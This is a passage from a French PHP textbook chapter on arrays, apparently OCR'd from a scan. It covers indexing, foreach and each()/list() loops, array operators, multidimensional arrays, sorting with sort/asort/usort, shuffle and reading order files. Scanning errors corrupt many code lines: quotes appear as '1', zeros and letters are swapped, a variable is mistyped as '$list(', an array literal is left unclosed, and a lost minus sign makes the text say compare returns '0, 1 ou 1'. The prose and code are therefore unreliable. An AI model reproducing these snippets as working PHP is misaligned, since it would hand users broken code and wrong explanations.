Par exemple, servez-vous de $produits[0], $produits[ 1 ] et $produits [2] pour acce- 
der au contenu du tableau $produits. 

Par defaut, l'element d'indice zero est le premier element du tableau. Le principe de 
numerotation de PHP est identique a celui de nombreux autres langages de programma- 
tion comme C, C++ ou Java. Si toutefois vous ne connaissez aucun de ces langages, il 
vous faudra peut-etre un peu de temps pour vous y accoutumer. 

Tout comme pour les autres variables, la modification du contenu des elements d'un 
tableau s'effectue au moyen de l'operateur =. La ligne de code qui suit remplace le 
premier element du tableau $produits, ' Pneus ', par l'element 'Fusibles' : 

$produits[0] = 'Fusibles'; 

L'instruction qui suit ajoute un nouvel element, 'Fusibles', a la fin du tableau; 
$produits a desormais quatre elements : 

$produits[3] = 'Fusibles'; 

La ligne de code suivante affiche le contenu du tableau : 

echo "$produits[0] $produits[1] $produits[2] $produits[3] " ; 

Bien que 1' analyse des chaines par PHP soit particulierement bien elaboree, vous pouvez 
commettre des erreurs dans ce domaine. Si vous avez des problemes avec des tableaux 
ou des variables non correctement interpretes lorsqu'ils sont encadres par des apostro- 
phes doubles, mettez-les hors de ceux-ci ou utilisez la syntaxe complexe presentee au 
Chapitre 4. La precedente instruction echo fonctionnera correctement, mais vous 
rencontrerez plusieurs autres exemples au cours de ce chapitre dans lesquels les variables 
sont situees en dehors des chaines encadrees par des apostrophes doubles. 

Tout comme les autres variables PHP, les tableaux ne necessitent pas une initialisation 
ou une creation prealables. lis sont automatiquement crees a leur premiere utilisation. 

Le code qui suit conduit a la creation du meme tableau $produits que celui que Ton a 
cree plus haut avec array ( ) : 

$produits[0] = 'Pneus'; 
$produits[1] = 'Huiles' ; 
$produits[2] = 'Bougies'; 
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Si le tableau $produits n'existe pas encore, la premiere ligne cree un nouveau tableau 
forme d'un seul element. Les lignes qui suivent ajoutent des valeurs au tableau qui vient 
d'etre cree. Le tableau est redimensionne dynamiquement lorsque vous lui ajoutez des 
elements. Cette possibilite de redimensionnement n'existe pas dans la plupart des autres 
langages de programmation. 

Utilisation de boucles pour acceder au contenu d'un tableau 

Lorsqu'un tableau est indice par une serie de nombres, son contenu peut etre affiche 
plus facilement grace a une boucle f or : 

for ( $i = 0; $i<3; $i++ ) { 
echo "$produits[$i] "; 

} 

Cette boucle produit une sortie identique a celle obtenue precedemment, tout en etant 
plus compacte. La possibilite d'utiliser ainsi une simple boucle pour acceder a chaque 
element d'un tableau est une particularite appreciable des tableaux. 

Nous pouvons egalement nous servir d'une boucle foreach, qui a ete specialement 
concue pour etre utilisee avec les tableaux : 

foreach ($produits as $element){ 
echo $element . ' ' ; 

} 

Ce code enregistre tour a tour chacun des elements du tableau dans la variable $element_ 
et affiche le contenu de celle-ci. 

Tableaux avec des indices differents 

Dans le tableau $produits, nous avons laisse PHP utiliser des indices par defaut pour 
chacun des elements. Cela signifie que le premier est l'element 0, le deuxieme, 
l'element 1, et ainsi de suite. Avec PHP, vous pouvez egalement choisir les cles ou les 
indices qui serviront a indexer un tableau. 

Initialisation d'un tableau 

L instruction qui suit cree un tableau dont les cles sont les noms des articles et les 
valeurs sont les prix : 

$prix = array (' Pneus ' =>1 00, ' Huiles ' =>1 0, 'Bougies'=>4 ); 

Le symbole entre les cles et les valeurs est simplement un signe egal immediatement 
suivi par un symbole superieur a. 
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Acces aux elements du tableau 

La encore, 1' acces au contenu du tableau s'effectue en specifiant le nom de la variable 
et une cle. Pour acceder au contenu du tableau $prix, nous pouvons done utiliser les 
expressions $prix[ 'Pneus' ],$prix[ 'Huiles' ]et$prix[ 'Bougies' ]. 

Les lignes de code qui suivent creent le meme tableau $prix que le precedent mais, 
au lieu de produire d'emblee un tableau forme de trois elements, cette version cree 
d'abord un tableau comprenant un seul element, puis lui ajoute deux elements 
supplementaires. 

$prix = array( 'Pneus'=>100 ); 
$prix[ 'Huile' ] = 10; 
$prix[ ' Bougies ' ] = 4; 

Voici une autre variante de ce fragment de code dont 1' execution produit un resultat 
identique. Ce code ne cree pas explicitement le tableau, mais conduit indirectement a sa 
creation lors de l'ajout du premier element : 

$prix[ 1 Pneus 1 ] = 100; 
$prix[ 'Huiles' ] = 10; 
$prix[ ' Bougies ' ] = 4; 

Utilisation de boucles 

Nous ne pouvons pas utiliser un simple compteur avec une boucle for pour parcourir le 
tableau precedent puisqu'il n'est pas indice par des nombres. Cependant, nous pouvons 
faire appel a une boucle foreachou aux constructions list() eteach(). 

Avec un tableau associatif, la boucle foreach peut adopter une syntaxe legerement 
differente. Vous pouvez 1' utiliser exactement comme dans l'exemple precedent ou y 
ajouter les cles : 

foreach ($prix as $nom => $montant) { 
echo "$nom : $montant<br />"; 

} 

Le fragment de code qui suit affiche le contenu du tableau $prix avec each ( ) : 

while ( $element = each( $prix ) ) { 

echo $element[ 'key' ] ; 

echo ' : ' ; 

echo $element[ 'value' ]; 

echo ' <br /> ' ; 

} 

L' execution de ce code produit le resultat montre a la Figure 3.2. 
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Figure 3.2 

Utilisation d'une instruction 
each() pour parcourir 
un tableau. 



n O r*, Mozilla Firefox 



Pneus : 100 
Huiles : 10 
Bougies : 4 



Au Chapitre 1, nous avons etudie la boucle while et l'instruction echo. Le fragment de 
code precedent met en oeuvre la fonction each, que nous rencontrons ici pour la 
premiere fois. Cette fonction renvoie 1' element courant d'un tableau et deplace le poin- 
teur du tableau sur l'element suivant. Dans ce code, la fonction each ( ) est invoquee au 
sein d'une boucle while, afin de renvoyer successivement les differents elements du 
tableau. L' execution de cette boucle prend fin lorsque l'interpreteur PHP atteint la fin 
du tableau. 

Dans ce code, la variable $element est un tableau. L'appel de la fonction each() 
renvoie en effet un tableau de quatre elements. Les emplacements indices par key et 
contiennent la cle de l'element courant, tandis que les emplacements indices par value 
et 1 contiennent la valeur de l'element courant. Ici, nous avons choisi d'utiliser des 
noms plutot que des numeros pour designer les emplacements. Au final, toutefois, ces 
deux choix sont equivalents. 

II existe une maniere plus elegante et plus commune d'obtenir ce resultat, en utilisant la 
fonction list() pour decouper le tableau en un ensemble de valeurs. Nous pouvons 
ainsi separer deux des valeurs renvoyees par la fonction each ( ) de la maniere suivante : 

$list( $nom, $montant ) = each( $prix ); 

Dans cette ligne de code, la fonction each() est utilisee pour obtenir l'element 
courant du tableau $prix, le renvoyer sous forme de tableau et pour passer a 
l'element suivant. On utilise egalement la fonction list() pour transformer les 
elements et 1 du tableau renvoye par la fonction each ( ) en deux nouvelles variables 
appelees $nom et $montant. 

Nous pouvons parcourir tout le contenu du tableau $prix et l'afficher dans la fenetre du 
navigateur au moyen des deux lignes de code suivantes : 

while ( list( $nom, $montant ) = each( $prix ) ) { 
echo "$nom : $montant<br />"; 

} 

L' execution de ces lignes de code produit le meme resultat que celui de la Figure 3.2, 
mais elles sont plus lisibles car la fonction list ( ) permet d'affecter des noms aux 
variables. 
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Avec la fonction each ( ) , le tableau memorise la position courante. Si vous devez utili- 
ser deux fois le meme tableau dans un script, il faut par consequent replacer la position 
courante du tableau au debut de celui-ci avec la fonction reset (). Pour afficher une 
seconde fois les prix des articles, il nous faudrait done executer les lignes de code 
suivantes : 

reset ($prix) ; 

while ( list( $nom, $montant ) = each( $prices ) ) { 
echo "$nom : $montant<br />"; 

} 

Operateurs sur les tableaux 

Un jeu special d'operateurs ne s'applique qu'aux tableaux. La purpart d'entre eux 
possedent un equivalent dans les operateurs scalaires, comme vous pouvez le remarquer 
dans le Tableau 3. 1. 



Tableau 3.1 : Operateurs de tableaux 



Ope rate ur 


Nom 


Exemple 


Resultat 


+ 


Union 


$a + $b 


Union de $a et $b. Le tableau $b est ajoute a 
$a, mais les cles en double ne sont pas 
ajoutees. 




Egalite 


$a == $b 


True si $a et $b contiennent les memes 
elements. 




Identite 


$a === $b 


True si $a et $b contiennent les memes 
elements, de meme type et dans le meme 
ordre. 


i = 


Inegalite 


$a != $b 


True si $a et $b ne contiennent pas les 
memes elements. 


<> 


Inegalite 


$a <> $b 


Identique a ! =. 




Non-identite 


$a !== $b 


True si $a et $b ne contiennent pas les 
memes elements, de meme type et dans le 
meme ordre. 



Ces operateurs sont assez evidents a comprendre, mais 1' union requiert quelques 
explications supplementaires. Cet operateur tente d'ajouter les elements de $b a la 
fin de $a. Si des elements de $b possedent les memes cles que certains elements qui 
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se trouvent deja dans $a, ils ne seront pas ajoutes. Autrement dit, aucun element de 
$a n'est ecrase. 

Vous remarquerez que les operateurs de tableaux du Tableau 3.1 possedent tous des 
operateurs equivalents qui fonctionnent sur les variables scalaires. Pour autant que vous 
vous souveniez que + realise 1' addition sur les types scalaires et l'union sur les tableaux, 
les comportements sont logiques. Vous ne pouvez pas comparer de maniere utile des 
tableaux a des types scalaires. 

Tableaux multidimensionnels 

Les tableaux ne sont pas necessairement de simples listes de cles et de valeurs. Chaque 
element d'un tableau peut lui-meme etre un autre tableau. Cette propriete permet de 
creer des tableaux a deux dimensions, qui peuvent etre assimiles a une matrice, ou grille, 
caracterisee par une largeur et une hauteur, c'est-a-dire un nombre determine de lignes 
et de colonnes. 

Par exemple, nous pourrions avoir recours a un tableau a deux dimensions pour stacker 
plusieurs informations relatives a chaque article vendu par l'entreprise de Bob. 

A la Figure 3.3, chaque ligne d'un tableau a deux dimensions represente un article 
particulier et chaque colonne represente un attribut (ou un type d' information) relatif 
aux produits. 



Code 


Description 


Prix 


PNE 


Pneus 


100 


HUl 


Huiles 


10 


BOU 


Bougies 


4 


w 



attrbuts d'un produit 



Figure 3.3 

Un tableau a deux dimensions permet de stocker plus d'informations relatives aux articles vendus 
par l'entreprise de Bob. 

Voici le code PHP qui pourrait etre utilise pour generer le tableau de la Figure 3.3 : 

$produits = array( array( 'PNE 1 , 'Pneus', 100 ), 
array( 'HUl', 'Huiles', 10 ), 
array ( 'BOU', 'Bougies', 4 ) ); 
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Ces lignes font bien apparaitre que le tableau $produits se compose desormais de trois 
autres tableaux. 

Souvenez-vous que, pour acceder a un element d'un tableau unidimensionnel, il faut 
specifier le nom du tableau et la cle de l'element. Dans un tableau a deux dimensions, 
l'acces s'effectue de maniere comparable, si ce n'est qu'a chaque element sont asso- 
ciees deux cles : une ligne et une colonne (la ligne la plus en haut est la ligne 0, tandis 
que la colonne la plus a gauche est la colonne 0). 

Nous pourrions ainsi afficher le contenu du tableau considere ici en accedant dans 
l'ordre et manuellement a chaque element, comme ici : 

echo 1 | ' .$produits[0] [0] . 1 | ' .$produits[0] [1 ] . ' | ' .$produits[0] [2] . ' |<br />' ; 
echo ' | ' .$produits[1 ] [0] . ' | ' .$produits[1] [1 ] . ' | 1 .$produits[ 1 ] [2] . ' | <br />' ; 
echo ' | ' .$produits[2] [0] . ' | 1 .$produits[2] [1 ] . ' | 1 .$produits[2] [2] . ' |<br />' ; 

Nous pourrions obtenir le meme resultat en inserant une boucle for dans une autre 
boucle f or, de la maniere suivante : 

for ( $ligne = 0; $ligne < 3; $ligne++ ) { 

for ( $colonne = 0; $colonne < 3; $colonne++ ) { 
echo ' | ' .$produits[$ligne] [$colonne] ; 

} 

echo ' | <br /> 1 ; 

} 

Chacune de ces deux variantes conduit au meme affichage dans la fenetre du navigateur 
web, c'est-a-dire : 

| PNE | Pneus | 1 00 | 
| HUI | Huiles | 10 | 
| BOU | Bougies | 4 | 

La seule difference est que la seconde variante est bien plus courte que la premiere dans 
le cas de tableaux volumineux. 

Au lieu de designer les colonnes par des numeros, vous pouvez choisir d'utiliser des 
noms de colonnes (voir Figure 3.3). Pour cela, vous pouvez utiliser des tableaux asso- 
ciatifs. Pour enregistrer le meme ensemble d' articles dans un tableau associatif dont les 
noms de colonnes seraient identiques a ceux de la Figure 3.3, vous pouvez ecrire le 
code suivant : 

$produits = array ( array ( Code => 'PNE', 

Description => 'Pneus', 
Prix => 100 

), 

array ( Code => ' HUI ' , 

Description => 'Huiles', 
Prix => 10 

), 
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array ( Code => ' BOU ' , 

Description => 'Bougies', 
Prix =>4 

) 

); 

Un tel tableau se revele plus facile a manipuler lorsqu'il s'agit de recuperer une seule 
valeur. II est en effet plus aise de se souvenir que la description d'un article est stockee 
dans la colonne Description, que de se souvenir qu'elle est stockee dans la colonne 1. 
Avec les indices descriptifs, il n'est pas necessaire de memoriser qu'une valeur est stockee 
a la position [x][y]. Les donnees peuvent y etre facilement retrouvees en specifiant les 
noms explicites des lignes et des colonnes. 

Nous sommes en revanche prives de la possibility d'utiliser une boucle for pour 
parcourir successivement les differentes colonnes du tableau. Le fragment de code qui 
suit permet d'af richer le contenu de ce tableau : 

for ( $ligne = 0; $ligne < 3; $ligne++ ) { 
echo ' | ' .$produits[$ligne] [ 'Code' ] . ' | ' . 

$produits[$ligne] [ 'Description' ] . ' | ' . 
Sproduits[$ligne] [ 'Prix' ] . ' |<br />' ; 

} 

Avec une boucle for nous pouvons parcourir le tableau "externe" $produits indice par 
des nombres. Chaque ligne de notre tableau $produits constitue un tableau avec des 
indices descriptifs. Les fonctions each( ) et list( ) peuvent ensuite etre inserees dans 
une boucle while pour parcourir les differents tableaux internes contenus dans 
$produits. Voici le code forme d'une boucle while imbriquee dans une boucle for : 

for ( $ligne = 0; $ligne < 3; $ligne++ ) { 
while ( list( $cle, $valeur ) = each( $produits[ $ligne ] ) ) 
{ 

echo ' |$valeur; 

} 

echo ' | <br /> ' ; 

} 

Vous n'etes pas limite a deux dimensions : en suivant le meme principe, rien n'empeche 
de creer un tableau dont les elements sont constitues de tableaux, eux-memes constitues 
de tableaux, et ainsi de suite. 

Un tableau a trois dimensions se caracterise par une largeur, une hauteur et une profon- 
deur. Si vous preferez vous representer un tableau a deux dimensions comme un tableau 
compose de lignes et de colonnes, vous pouvez vous representer un tableau a trois 
dimensions comme un empilement de tels tableaux. Chaque element est alors reference 
par sa couche, sa ligne et sa colonne. 
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Si Bob classe ses articles en differentes categories, un tableau a trois dimensions 
permettra de stacker cette information supplementaire. La Figure 3.4 montre la structure 
que pourrait avoir un tel tableau. 



Figure 3.4 

Ce tableau a trois 
dimensions permet 
de classer les articles 
en categories. 




Pieces camions 



Code 



Description 



Prix 



Pieces motos 



Code 



Description 



attributs d'un produit 



Prix 



Pieces voitures 


Code 


Description 


Prix 


VOI PNE 


Pneus 


100 


VOI HUI 


Huiles 


10 


VOI BOU 


Bougies 


4 





Dans le fragment de code qui suit, il apparait clairement qu'un tableau a trois dimensions 
est un tableau contenant des tableaux de tableaux : 

$categories = array( array ( array( 'V0I_PNE', 'Pneus', 100 ), 

array( ' V0I_HUI ' , 'Huiles', 10 ), 

array( 'V0I_B0U', 'Bougies', 4 ) 

). 

array ( array( 'M0T_PNE', 'Pneus', 120 ), 

array( 'M0T_HUI', 'Huiles', 12 ), 

array ( 'M0T_B0U', 'Bougies', 5 ) 

)> 

array ( array ( 'CAM_PNE', 'Pneus', 150 ), 

array ( 'CAM_HUI', 'Huiles', 15 ), 

array ( 'CAM_B0U', 'Bougies', 6 ) 



Ce tableau ne comprenant que des cles numeriques, nous pouvons nous servir de 
boucles for imbriquees pour af richer son contenu : 

for ( $couche = 0; $couche < 3; $couche++ ) { 
echo "Couche $couche<br />"; 
for ( $ligne = 0; $ligne < 3; $ligne++ ) { 
for ( $colonne = 0; $colonne < 3; $colonne++ ) { 
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echo ' | ' .$categories[$couche] [$ligne] [$colonne] ; 

} 

echo ' | <br /> ' ; 

} 

} 

Compte tenu de la maniere dont sont crees les tableaux multidimensionnels, vous 
pouvez tres bien produire des tableaux a quatre, cinq ou six dimensions. Le langage 
PHP n' impose en realite aucune limite sur le nombre de dimensions d'un tableau. 
Toutefois, les constructions a plus de trois dimensions sont difficiles a visualiser. 
Des tableaux a trois dimensions ou moins suffisent generalement a traiter la plupart des 
problemes et situations du monde reel. 

Tri de tableaux 

II est souvent tres utile de trier les donnees apparentees qui sont stockees dans un 
tableau. Le tri d'un tableau unidimensionnel est une operation tres simple. 

Utilisation de la fonction sortQ 

Les deux lignes de code qui suivent trient un tableau dans l'ordre alphabetique : 

$produits = array ( 'Pneus 1 , 'Huiles', 'Bougies' ); 
sort ($produits) ; 

Apres l'execution de ce code, les elements contenus dans le tableau sont classes dans 
l'ordre suivant : Bougies, Huiles, Pneus. 

II est egalement possible de trier des valeurs en suivant l'ordre numerique. Prenons le 
cas d'un tableau contenant les prix des articles vendus par Bob. Le contenu de ce 
tableau pourrait etre trie par ordre numerique croissant, au moyen des instructions 
suivantes : 

$prix = array( 100, 10, 4 ) ; 
sort ($prix) ; 

Les prix seraient alors classes dans l'ordre suivant : 4, 1 0, 1 00. 

Notez que la fonction sort() est sensible a la casse (a l'utilisation de majuscules/ 
minuscules). Les lettres majuscules sont classees avant les lettres minuscules : "A" est 
inferieur a "Z", mais "Z" est inferieur a "a". 

La fonction admet egalement un second parametre facultatif. Vous pouvez passer l'une 
des constantes SORT REGULAR (par defaut), SORT NUMERIC ou SORT STRING. Cette capa- 
cite a specifier le type de tri est utile lorsque vous comparez des chaines qui peuvent 
contenir des nombres, comme 2 et 1 2. Numeriquement, 2 est inferieur a 1 2 mais, en tant 
que chaine, '12' est inferieure a ' 2 ' . 
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Utilisation des fonctions asortQ et ksortQ pour trier des tableaux 

Si nous enregistrons des articles et leurs prix dans un tableau a cles descriptives, nous 
devrons avoir recours a differents types de fonctions de tri pour obtenir que les cles et 
les valeurs correspondantes restent associees lors du tri. 

La premiere instruction qui suit cree un tableau contenant les trois articles decrits 
precedemment, avec les prix correspondants, tandis que la deuxieme ligne de code trie 
ce tableau par ordre de prix croissants : 

$prix = array( ' Pneus ' =>1 00, 'Huiles'=>10, 'Bougies'=>4 ); 
asort ($prix) ; 

La fonction asort ( ) trie le contenu du tableau qui lui est fourni en parametre d'apres la 
valeur de chaque element. Dans le tableau considere ici, les valeurs sont les prix tandis 
que les cles sont les descriptions textuelles. Pour trier le tableau non pas en fonction des 
prix, mais des descriptions, c'est la fonction ksort( ) qui doit etre employee. La fonc- 
tion ksort ( ) effectue un tri sur la base des cles et non pas des valeurs. Le fragment de 
code qui suit genera un tableau trie en tenant compte de l'ordre alphabetique des cles 
(Bougies, Huiles, Pneus) : 

$prix = array( ' Pneus ' =>1 00, 'Huiles'=>10, 'Bougies'=>4 ); 
ksort ($prix) ; 

Tri dans l'ordre inverse 

Nous venons d'examiner les fonctions de tri sort ( ) , asort ( ) et ksort ( ) , qui effectuent 
toutes trois des tris par ordre croissant. A chacune de ces fonctions correspond une 
fonction de tri inverse, dont la fonctionnalite est identique si ce n'est qu'elle precede a 
un tri decroissant. Ces versions inverses des fonctions de tri sont respectivement 
rsort ( ), arsort ( ) et krsort ( ). 

Les fonctions de tri inverses s'utilisent de la meme maniere que les fonctions de tri vues 
jusqu'ici. La fonction rsort ( ) permet de trier par ordre decroissant un tableau unidi- 
mensionnel indice numeriquement. La fonction arsort ( ) trie par ordre decroissant un 
tableau unidimensionnel selon les valeurs des elements. Quant a la fonction krsort ( ), 
elle trie un tableau unidimensionnel par ordre decroissant, selon les cles des elements. 

Tri de tableaux multidimensionnels 

Le tri d'un tableau a plusieurs dimensions, ou en suivant un ordre autre que les ordres 
alphabetique ou numerique, est plus complique. En effet, PHP sait comparer deux 
nombres ou deux chaines de caracteres mais, dans un tableau multidimensionnel, 
chaque element est lui-meme un tableau, or PHP ne connait pas d'emblee les criteres a 
retenir pour comparer deux tableaux. Par consequent, vous devez creer une methode 
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pour operer cette comparaison. Le plus souvent, la comparaison de mots ou de nombres 
est triviale. En revanche, pour des objets complexes, elle peut se reveler problematique. 

Tris definis par I'utilisateur 

Soit le tableau deja considere precedemment et dont la definition est la suivante : 

$produits = array( array( ' PNE ' , 'Pneus', 100 ), 
array( ' HUI ' , 'Huiles ' , 10 ) , 
array ( 'BOLT, 'Bougies', 4 ) ); 

Ce tableau contient trois articles vendus par l'entreprise de Bob, avec un code, une 
description et un prix par article. 

A quel resultat aboutira le tri de ce tableau ? Deux types d'ordres au moins pourraient 
ici etre utiles : un tri des articles par ordre alphabetique des descriptions ou par ordre 
numerique des prix. Chacun de ces tris peut etre implements en utilisant la fonction 
usort() et en indiquant a 1'interpreteur PHP le critere sur lequel la comparaison doit 
s'effectuer. Pour cela, nous allons devoir ecrire notre propre fonction de comparaison. 

Le fragment de code donne ci-apres conduit au tri du tableau selon l'ordre alphabetique 
des descriptions, c'est-a-dire par rapport a la deuxieme colonne du tableau : 

function compare($x, $y){ 
if ( $x[1] == $y[l] ) { 

return 0; 
} else if ( $x[1] < $y[1] ){ 

return -1 ; 
} else 

return 1 ; 

} 

} 

usort ($produits, 'compare'); 
Jusqu'ici, nous nous sommes servis d'un certain nombre de fonctions predefinies de 
PHP. Pour trier notre tableau, nous avons eu besoin de defmir notre propre fonction. 
L' denture de fonctions personnalisees est traitee en detail au Chapitre 5 mais, pour 
l'heure, en voici une breve introduction. 

En PHP, la definition d'une fonction requiert le mot-cle function. Pour definir une 
fonction personnalisee, vous devez lui attribuer un nom, qu'il est conseille de choisir 
soigneusement. Ici, par exemple, nous avons choisi d'appeler notre fonction 
compare(). Nombre de fonctions attendent des parametres. Notre fonction compare () 
en prend deux : un appele x et un appele y. Cette fonction sert a comparer les deux 
valeurs qui lui sont passees en parametre et a determiner leur ordre. 

Pour cet exemple, les parametres x et y contiendront deux des tableaux contenus dans le 
tableau principal et qui represented chacun un article different. Pour acceder au champ 
Description du tableau x, nous devons ecrire $x[1 ]. En effet, la Description est le 
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deuxieme element dans chacun des "sous-tableaux" et la numerotation commence a 
zero. $x[1] et $y[1] permettent done de comparer les champs Description stockes 
dans les tableaux passes comme arguments a la fonction compare ( ) . 

Lorsque 1' execution d'une fonction s'acheve, celle-ci peut renvoyer une reponse au 
code qui l'a appelee. On dit alors que la fonction renvoie une valeur. Pour cela, vous 
devez utiliser le mot-cle return. Par exemple, la ligne de code return 1 ; renvoie la 
valeur 1 au code qui a appele la fonction. 

Pour etre utilisable par usort ( ) , compare ( ) doit comparer x et y et renvoyer si x est 
egal a y, un nombre negatif si x est inferieur a y et un nombre positif si x est superieur a 
y. Notre fonction compare renvoie done 0, 1 ou 1 selon les valeurs x et y qui lui sont 
fournies. 

La derniere ligne du code precedent appelle la fonction predefinie usort () en lui 
passant en parametre le nom du tableau a trier ($produits) et le nom de la fonction de 
comparaison personnalisee (compare ( ) ) . 

Pour trier notre tableau sur d'autres criteres, il suffit d'ecrire une autre fonction de 
comparaison. Pour, par exemple, trier le tableau en fonction des prix, la comparaison 
doit porter sur la troisieme colonne des tableaux. La definition de la fonction compare ( ) 
devrait alors etre la suivante : 

function compare($x, $y) { 
if ( $x[2] == $y[2] ) { 

return 0; 
} else if ( $x[2] < $y[2] ) { 

return -1 ; 
} else 

return 1 ; 

} 

} 

L'appel usort ($produits , compare) entraine le tri du tableau par ordre de prix 
croissants. 

La prefixe "u" de la fonction usort () est l'abreviation de user (utilisateur) car cette 
fonction requiert la specification d'une fonction de comparaison definie par l'utilisa- 
teur. De la meme maniere, les versions uasort() et uksort() des fonctions asort et 
ksort necessitent egalement qu'une fonction de comparaison definie par l'utilisateur 
leur soit passee en parametre. 

La fonction uasort() fait pendant a la fonction asort () et s'utilise pour trier un 
tableau indice numeriquement selon les valeurs. Si ces valeurs sont des nombres ou du 
texte, utilisez asort mais, si ce sont des objets plus complexes, comme des tableaux, 
definissez une fonction de comparaison et utilisez uasort ( ) . 
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La fonction uksort() fait pendant a la fonction ksort() et s'utilise pour trier un 
tableau associatif selon ses cles. Si ces cles sont des nombres ou du texte, utilisez ksort 
mais, si ce sont des objets plus complexes, comme des tableaux, definissez une fonction 
de comparaison et utilisez u ksort ( ) . 

Tris definis par I'utilisateur, dans I'ordre inverse 

Chacune des fonctions sort(), asort() et ksort () a sa fonction equivalente 
commencant par "r" pour produire un tri dans I'ordre inverse. Les tris definis par 
I'utilisateur n'ont pas de variantes "inverses", mais vous pouvez quand meme trier 
en ordre inverse un tableau multidimensionnel en fonction d'un ordre inverse en 
ecrivant une fonction de comparaison qui renvoie les valeurs opposees. II suffit que 
la fonction de comparaison renvoie 1 lorsque $x est inferieur a $y et 1 lorsque $x est 
superieur a $y : 

function comparelnverse ($x , $y) { 
if ( $x[2] == $y[2] ) { 

return 0; 
} else if ( $x[2] < $y[2] ) { 

return 1 ; 
} else 

return -1 ; 

} 

} 

Dans notre exemple, l'appel de usort ($produits , comparelnverse) produirait un 
tableau trie par ordre de prix decroissants. 

Reordonner des tableaux 

Dans certaines applications, il peut etre necessaire de "reordonner" des tableaux selon 
d'autres criteres. La fonction shuffle () permet de "melanger" les elements d'un 
tableau, c'est-a-dire de les ordonner de maniere aleatoire. La fonction 
array reverse ( ) permet quant a elle d'obtenir une copie d'un tableau dans laquelle 
tous les elements ont ete tries dans I'ordre inverse. 

Utilisation de la fonction shuffle() 

Bob aimerait que la page d'accueil de son site presente quelques-uns des produits 
proposes a la vente. II voudrait montrer trois des articles de son catalogue choisis au 
hasard et faire en sorte que ceux-ci soient differents a chaque nouvelle visite de ses 
clients, pour preserver l'interet de ces derniers. Ceci est tres facile a realiser si tous les 
articles sont stockes dans un tableau. L execution du code du Listing 3.1 permet d'af ri- 
cher trois images choisies au hasard : le contenu du tableau est reordonne de maniere 
aleatoire et seuls ses trois premiers elements sont affiches. 
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Listing 3.1 : bobs_front _page.php — Utilisation de PHP pour produire une page 
d'accueil dynamique sur le site web du garage de Bob 



<?php 

$images = array (' pneu . j pg ' , 'huile.jpg', 'bougie.jpg', 
'porte.jpg' , 1 volant . j pg 1 , 
1 thermostat . j pg ' , ' essuie_glace . j pg ' , 
' joint . ] pg ' , ' plaquette_f rein . j pg 1 ) ; 

shuffle($images) ; 

?> 

<html> 
<head> 

<title>Le garage de Bob</title> 
</head> 
<body> 

<h1>Le garage de Bob</h1> 
<div align="center"> 
<table width = ' 1 00% ' > 
<tr> 

<?php 

for ( $i = 0; $i < 3; $i++ ) { 

echo '<td align="center"><img src="'; 
echo $images[$i] ; 

echo '" width="100" height="100"></td>' ; 

} 

?> 

</tr> 
</table> 
</div> 
</body> 
</html> 



Le code du Listing 3.1 effectuant une selection aleatoire d'images, il conduit a l'affi- 
chage d'une page differente a chaque chargement ou presque (voir Figure 3.5). 



Figure 3.5 

La fonction shuffle() 
est utilisee ici pour 
afficher trois articles 
choisis au hasard. 



Le garage de Bob 

GT^P ' Co) GO Cu.C CD®* 
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Utilisation de la fonction array _reverse() 

La fonction array reverse () prend un tableau en parametre et en cree un nouveau 
dont le contenu est celui de depart trie dans l'ordre inverse. Considerons par exemple le 
cas d'un tableau contenant un decompte de dix a un. II ya plusieurs facons de produire 
un tel tableau. 

La fonction range ( ) cree generalement une serie croissante que vous pouvez trier par 
ordre decroissant en utilisant array reverse () ou rsort(). Nous pouvons egalement 
creer les elements du tableau un a un, au moyen d'une boucle for, comme ici : 

$nombres = array ( ) ; 
for($i = 10; $i > 0; $i--) { 
array_push( $nombres, $i ); 

} 

Une boucle for peut proceder par ordre decroissant : il suffit de choisir une valeur 
initiale suffisamment elevee et d'utiliser l'operateur pour decrementer le compteur 
d'une unite a chaque repetition de la boucle. 

Le code precedent commence par creer un tableau vide, puis remplit peu a peu ce 
tableau grace a la fonction array push ( ) , laquelle ajoute chaque nouvel element a la 
fin du tableau. La fonction array pop( ) fait pendant a la fonction array push() : elle 
supprime et renvoie 1' element situe a la fin du tableau qui lui est passe en parametre. 

Nous pouvons egalement utiliser la fonction array reverse ( ) pour trier dans l'ordre 
inverse un tableau produit avec range ( ) : 

$nombres = range(1,10); 

$nombres = array_reverse($nombres) ; 

Notez que la fonction array reverse ( ) renvoie une copie modifiee du tableau qui lui 
est passe en parametre. Si, comme ici, vous ne souhaitez pas conserver le tableau initial, 
il suffit de l'ecraser avec la nouvelle copie. 

Si vos donnees correspondent simplement a une plage d'entiers, vous pouvez creer 
cette plage en ordre inverse en passant -1 comme parametre de pas a range ( ) : 

$nombres = range(10, 1, -1); 

Chargement de tableaux a partir de fichiers 

Nous avons vu au Chapitre 2 comment enregistrer les commandes client dans un 
fichier. Chaque ligne se presentait de la maniere suivante : 

15:42 le 20-04 4 pneus 1 bidons d'huiles 6 bougies 434. 00€ 22 rue noire, Toulouse 
Pour traiter cette commande, nous pouvons avoir besoin de recharger le contenu de ce 
fichier dans un tableau. Le script presente dans le Listing 3.2 permet d'afficher le 
contenu de ce fichier. 
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Listing 3.2 : vieworders.php — Utilisation de PHP pour afficher le contenu du fichier 
de commandes de I'entreprise de Bob 



<?php 

// Creation d'un nom abrege de variable 
$D0CUMENT_R00T = $_SERVER[ ' D0CUMENT_R00T ' ] ; 

$commandes = file( "$D0CUMENT_R00T/ .. /orders/orders. txt" ) ; 

$nbre_de_cdes = count($commandes) ; 
if ($nbre_de_cdes == 0) { 
echo "<p><strong>Aucune commande en attente. 
Reessayez plus tard.</strong></p>" ; 

} 

for ($i = 0; $i < $nbre_de_cdes ; $i++) { 
echo $commandes[$i] . "<br />"; 

} 

?> 



Ce script produit presque le meme affichage que le Listing 2.3, au Chapitre 2 (voir 
Figure 2.4). Cette fois, cependant, on utilise la fonction file ( ) pour charger l'integra- 
lite du fichier dans un tableau. Chaque ligne du fichier devient alors un element du 
tableau ainsi produit. 

Par ailleurs, le Listing 3.2 utilise la fonction count () pour determiner le nombre 
d'elements contenus dans le tableau cree. 

Nous pouvons aller plus loin et charger chacune des sections des lignes de commandes 
dans des elements tableaux distincts, afin de traiter les sections separement les unes des 
autres ou de les mettre en forme de maniere plus attractive. C'est ce que fait le code du 
Listing 3.3. 

Listing 3.3 : vieworders2.php — Utilisation de PHP pour separer, mettre en forme 
et afficher les commandes recues par I'entreprise de Bob 



<?php 

// Creation d'un nom abrege de variable 
$D0CUMENT_R00T = $_SERVER[ ' D0CUMENT_R00T ' ] ; 

?> 

<html> 
<head> 

<title>Le garage de Bob - Commandes clients</title> 
</head> 
<body> 

<h1>Le garage de Bob</h1> 
<h2>Commandes clients</h2> 
